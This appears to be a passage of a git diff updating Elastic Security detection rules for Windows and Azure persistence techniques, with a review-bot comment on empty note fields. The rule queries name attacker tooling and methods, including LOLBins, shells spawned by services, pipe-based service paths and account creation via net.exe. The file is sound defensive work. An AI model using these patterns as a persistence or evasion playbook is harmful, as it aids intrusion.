@@ -15,10 +15,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Execution via Scheduled Task", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n /* Schedule service cmdline on Win10+ */\n process.parent.name : \"svchost.exe\" and process.parent.args : \"Schedule\" and\n /* add suspicious programs here */\n process.pe.original_file_name in\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) and\n /* add suspicious paths here */\n process.args : (\n \"C:\\\\Users\\\\*\",\n \"C:\\\\ProgramData\\\\*\", \n \"C:\\\\Windows\\\\Temp\\\\*\", \n \"C:\\\\Windows\\\\Tasks\\\\*\", \n \"C:\\\\PerfLogs\\\\*\", \n \"C:\\\\Intel\\\\*\", \n \"C:\\\\Windows\\\\Debug\\\\*\", \n \"C:\\\\HP\\\\*\")\n", + "note": "", + "query": "process where event.type == \"start\" and\n /* Schedule service cmdline on Win10+ */\n process.parent.name : \"svchost.exe\" and process.parent.args : \"Schedule\" and\n /* add suspicious programs here */\n process.pe.original_file_name in\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) and\n /* add suspicious paths here */\n process.args : (\n 
\"C:\\\\Users\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"C:\\\\Windows\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\Windows\\\\Debug\\\\*\",\n \"C:\\\\HP\\\\*\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_service_created_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_service_created_registry.json index 11e7195a8de4b..2701aa5b0d30a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_service_created_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_service_created_registry.json 
@@ -11,6 +11,18 @@ "license": "Elastic License v2", "name": "Suspicious ImagePath Service Creation", "query": "registry where registry.path : \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\" and\n /* add suspicious registry ImagePath values here */\n registry.data.strings : (\"%COMSPEC%*\", \"*\\\\.\\\\pipe\\\\*\")\n", + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317", "severity": "high", @@ -47,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_system_shells_via_services.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_system_shells_via_services.json index d5f1379a835e9..19773777eee1d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_system_shells_via_services.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_system_shells_via_services.json 
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from\nadministrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to\nservice activities (for example, 4697 and/or 7045).\n - Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive\n(B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n \n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from\nadministrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to\nservice activities (for example, 4697 and/or 7045).\n - Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive\n(B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "0022d47d-39c7-4f69-a232-4fe9dc7a3acd", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_time_provider_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_time_provider_mod.json index 8c4037fd44893..0adc5d22a24f2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_time_provider_mod.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_time_provider_mod.json @@ -14,6 +14,23 @@ "references": [ "https://pentestlab.blog/2019/10/22/persistence-time-providers/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204", "severity": "medium", @@ -50,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_added_to_privileged_group_ad.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_added_to_privileged_group_ad.json index 3558fcd594e4a..f1a4d9b5b7bea 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_added_to_privileged_group_ad.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_added_to_privileged_group_ad.json 
@@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "User Added to Privileged Group in Active Directory", - "note": "## Triage and analysis\n\n### Investigating User Added to Privileged Group in Active Directory\n\nPrivileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are\ngranted that allow them to perform nearly any action in Active Directory and on domain-joined systems.\n\nAttackers can add users to privileged groups to maintain a level of access if their other privileged accounts are\nuncovered by the security team. This allows them to keep operating after the security team discovers abused accounts.\n\nThis rule monitors events related to a user being added to a privileged group.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should manage members of this group.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This attack abuses a legitimate Active Directory mechanism, so it is important to determine whether the activity is\nlegitimate, if the administrator is authorized to perform this operation, and if there is a need to grant the account\nthis level of privilege.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the admin is not aware of the operation, activate your Active Directory incident response plan.\n- If the user does not need the administrator privileges, remove the account from the privileged group.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the 
mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating User Added to Privileged Group in Active Directory\n\nPrivileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are\ngranted that allow them to perform nearly any action in Active Directory and on domain-joined systems.\n\nAttackers can add users to privileged groups to maintain a level of access if their other privileged accounts are\nuncovered by the security team. This allows them to keep operating after the security team discovers abused accounts.\n\nThis rule monitors events related to a user being added to a privileged group.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should manage members of this group.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This attack abuses a legitimate Active Directory mechanism, so it is important to determine whether the activity is\nlegitimate, if the administrator is authorized to perform this operation, and if there is a need to grant the account\nthis level of privilege.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the admin is not aware of the operation, activate your Active Directory incident response plan.\n- If the user does not need the administrator privileges, remove the account from the privileged group.\n- Review the privileges of the 
administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "iam where event.action == \"added-member-to-group\" and\n group.name : (\"Admin*\",\n \"Local Administrators\",\n \"Domain Admins\",\n \"Enterprise Admins\",\n \"Backup Admins\",\n \"Schema Admins\",\n \"DnsAdmins\",\n \"Exchange Organization Administrators\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_creation.json index 7cfbc30fca454..950324d76f884 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_creation.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_account_creation.json 
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "User Account Creation", - "note": "## Triage and analysis\n\n### Investigating User Account Creation\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `net.exe` to create new accounts.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before\ninvestigating further, verify that this activity is not benign.\n\n### Related rules\n\n- Creation of a Hidden Local User Account - 2edc8076-291e-41e9-81e4-e3fcbc97ae5e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating User Account Creation\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `net.exe` to create new accounts.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before\ninvestigating further, verify that this activity is not benign.\n\n### Related rules\n\n- Creation of a Hidden Local User Account - 2edc8076-291e-41e9-81e4-e3fcbc97ae5e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"net.exe\", \"net1.exe\") and\n not process.parent.name : \"net.exe\" and\n (process.args : \"user\" and process.args : (\"/ad\", \"/add\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", 
@@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_application.json index 1d0990e951925..9037915aba8c9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_application.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_application.json @@ -11,10 +11,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "User Added as Owner for Azure Application", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to application\" and event.outcome:(Success or success)\n", + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "774f5e28-7b75-4a58-b94e-41bf060fdd86", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
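Review bot: The investigation guide is replaced by an empty string, `"note": "",`, instead of the key being dropped, so the rule now ships a `note` that is present but blank once its only section has moved to `setup`; if the rule schema treats `note` as optional, omitting the key is the cleaner form. The same `"note": ""` pattern appears in the service-principal, application-shimming, BITS job notify, hidden run key, LSA security support provider, TelemetryController and Update Orchestrator rules in this diff. If these files are produced by the rules exporter, the fix presumably belongs in the generator rather than in the JSON by hand.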
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_service_principal.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_service_principal.json index b68b4826bc4cf..36d8fb57cefff 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_service_principal.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_user_added_as_owner_for_azure_service_principal.json @@ -11,13 +11,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "User Added as Owner for Azure Service Principal", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to service principal\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/develop/app-objects-and-service-principals" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "38e5acdd-5f20-4d99-8fe4-f0a1a592077f", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -46,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_application_shimming.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_application_shimming.json index cac0497455b68..fbf9bb1682bbc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_application_shimming.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_application_shimming.json @@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Application Shimming via Sdbinst", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"sdbinst.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -72,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_atom_init_file_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_atom_init_file_modification.json index 0977d8310cf6b..4b71a76459d83 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_atom_init_file_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_atom_init_file_modification.json @@ -16,6 +16,33 @@ "https://github.com/D00MFist/PersistentJXA/blob/master/AtomPersist.js", "https://flight-manual.atom.io/hacking-atom/sections/the-init-file/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "b4449455-f986-4b5a-82ed-e36b129331f7", "severity": "low", @@ -26,7 +53,24 @@ "Threat Detection", "Persistence" ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_bits_job_notify_command.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_bits_job_notify_command.json index 8625a3bdedc6a..7a09b0fadbf5b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_bits_job_notify_command.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_bits_job_notify_command.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via BITS Job Notify Cmdline", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.parent.args : \"BITS\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\WINDOWS\\\\system32\\\\directxdatabaseupdater.exe\")\n", "references": [ "https://pentestlab.blog/2019/10/30/persistence-bits-jobs/", 
@@ -20,8 +20,31 @@ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-setnotifycmdline", "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-2" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_hidden_run_key_valuename.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_hidden_run_key_valuename.json index d7b66aa33106c..b19415fcdeff7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_hidden_run_key_valuename.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_via_hidden_run_key_valuename.json 
